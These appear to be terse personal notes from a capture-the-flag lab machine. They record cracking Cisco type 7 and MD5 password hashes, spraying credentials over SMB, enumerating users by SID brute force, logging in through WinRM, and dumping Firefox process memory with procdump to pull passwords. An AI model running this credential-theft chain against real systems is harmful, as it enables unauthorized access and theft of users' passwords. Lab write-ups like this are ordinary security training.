nmap -sVC  10.129.1.106  -p 1-60000 -Pn

use website decrypt  cisco type7 decrypte
0242114B0E143F015F5D1E161713  $uperP@ssword
02375012182C1A1D751618034F36415408  Q4)sJu\Y8qz*A3?d
use hashcat decrypt md5
$1$pdQG$o8nrSzsGXeaduXrjlvKc91   stealth1agent
use cme smb get password
crackmapexec smb -u users.txt -p password.txt --shares 10.129.1.106
use Impacket网络协议工具 find users
python3 lookupsid.py 'Hazard:stealth1agent'@10.129.1.106

[*] Brute forcing SIDs at 10.129.1.106
[*] StringBinding ncacn_np:10.129.1.106[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

evil-winrm -u 'Hazard' -p  'stealth1agent' -i 10.129.1.106
gc -recurse . | select fullname

nothing can use
C:\inetpub\wwwroot    issuse.php   login.php  attachments/config

Get-Process   foind firefox can exploit

change to Documents that we have exectue permision
C:\Users\Chase\Documents>
upload procdump64.exe
upload /home/qoo7972365/PycharmProjects/kali/heist/sysinter/procdump64.exe
./procdump64.exe -accepteula
###dump pid process
./procdump64.exe -ma 728
dowanload firefox.exe_201130_180656.dmp
find password in dmp
strings firefox.exe_201130_180656.dmp  |grep "http" |grep "password"
add 4dD!5}x/re8]FBuZ password in passowrd.txt and try
